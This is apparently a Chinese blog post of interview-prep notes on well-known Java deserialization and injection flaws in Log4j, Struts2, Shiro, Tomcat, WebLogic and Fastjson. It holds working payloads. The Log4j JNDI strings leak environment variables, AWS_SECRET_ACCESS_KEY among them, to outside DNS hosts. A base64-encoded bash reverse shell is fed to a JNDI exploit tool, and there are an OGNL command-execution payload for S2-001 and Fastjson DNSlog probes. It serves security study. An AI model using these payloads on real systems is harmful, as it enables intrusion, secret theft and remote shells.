关于面试常问到的几种Java反序列化

更新一下笔记中JAVA的几个知名的反序列化漏洞，仅漏洞poc和原理，无分析过程。

Log4j

条件：出网（因为需要请求jndi服务器）

${jndi:ldap://yuvs2b.ceye.io}	//外带请求
${jndi:ldap://${java:version}.f2478a5a.ipv6.1433.eu.org}	//外带数据
${java:version}、${env:JAVA_VERSION}、${env:USER}、${env:AWS_SECRET_ACCESS_KEY}、${env:hostName}

rce

${jndi:ldap://rce.malware.example/a}

Log4j看到${jndi:ldap://rce.malware.example/a}查找表达式并提取JNDI伪URL：ldap://rce.malware.example/a将其传递给JNDI以供处理。JNDI看到该URL使用了LDAP目录服务提供程序，并向rce.malware.example站点发起一条LDAP查询。由于rce.malware.example是被攻击者所控制的，因此可以发送一个引用载荷作为LDAP响应.

反弹shell

linux

https://github.com/welk1n/JNDI-Injection-Exploit

本地监听端口

利用log4j工具，将反弹shell编码

bash -i >& /dev/tcp/172.16.13.132/7314 0>&1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTMuMTMyLzczMTQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "172.16.13.132"

目标执行

payload:rmi://172.16.13.132:1099/m1gepx

Struts2

Apache Struts2

指纹特征：.do或.action

S2-001

成因：用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

S2-003

struts2会将http的每个参数名解析为OGNL语句执行，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制

S2-005

S2-003未修复完全，官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补，但攻击者可以利用OGNL表达式将这2个选项打开。

Shiro

Apache Shiro

指纹特征：返回包中cookie值存在remeberMe

Shiro-550采用先验证rememberme的值，然后再进行身份验证，而rememberme的值是通过base64解码后再进行AES解密，然后未进行过滤处理就进行反序列化，然后由于AES解密过程中的密钥是硬编码在代码里的，开发人员没有进行修改，导致攻击者可以通过默认密钥构造恶意的序列化对象，从而绕过了身份认证实现了rce。
Shiro-721则采用先身份认证，然后再验证rememberme的值，并且它采用了AES-CBC的分组对称加密，key是虽然key猜不到了，但是这种加密方式可以利用填充的方式再次实现rce
（CBC是密码分组链接）

Tomcat

Apache Tomcat

当tomcat开启session持久化功能，并同时存在上传功能，攻击者可通过构造恶意的请求达到远程命令执行的效果

后台弱口令上传war包

影响版本：Tomcat版本：7.0.x ~ 8.0.x

war包命令生成

jar -cvf 1.war 1.jsp

WAR file to deploy功能上传文件，自动解压。

WebLogic

Oracle WebLogic

指纹特征：Error 404-Not Found

Fastjson

阿里 Fastjson
Java站并且传的数据是JSON格式的都可以尝试

原理

Fastjson fastjson可以解析用户提交的JSON字符串，并将其转换为Java对象。
但是如果用户提交了一个恶意的JSON字符串，其中包含了可以执行Java代码的特殊字符串，那么fastjson在转换过程中可能会执行这段代码，从而导致漏洞。
可以使用fastjson的白名单功能来避免

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，autoType标注了类对应的原始类型，方便在反序列化的时候定位到具体类型，fastjson在对JSON字符串进行反序列化的时候，就会读取@type的内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链,造成远程代码执行。
因为有了autoType功能，那么fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。那 么就可以利用这个特性，自己构造一个JSON字符串，并且使用@type指定一个自己想要使用的攻击类库。
在fastjson中我们使用JdbcRowSetImpl进行反序列化的攻击，我们给此类中的setDataSourcesName输入恶意内容（rmi链接），让目标服务在反序列化的时候，请求rmi服务器，执行rmi服务器下发的命令，从而导致远程命令执行漏洞

指纹特征

1、根据返回包判断
任意抓个包，提交方式改为POST，花括号不闭合。返回包在就会出现fastjson字样。当然这个可以屏蔽。

2、利用DNSlog盲打

利用DNSlog盲打

构造以下payload，利用sdnslog平台接收。

 {"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

1.2.67版本后payload

 {"@type":"java.net.Inet4Address","val":"dnslog"}
 {"@type":"java.net.Inet6Address","val":"dnslog"}
 畸形：{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

__EOF__

本文作者：LinkPoc
本文链接：https://www.cnblogs.com/Y0uhe/p/17688235.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！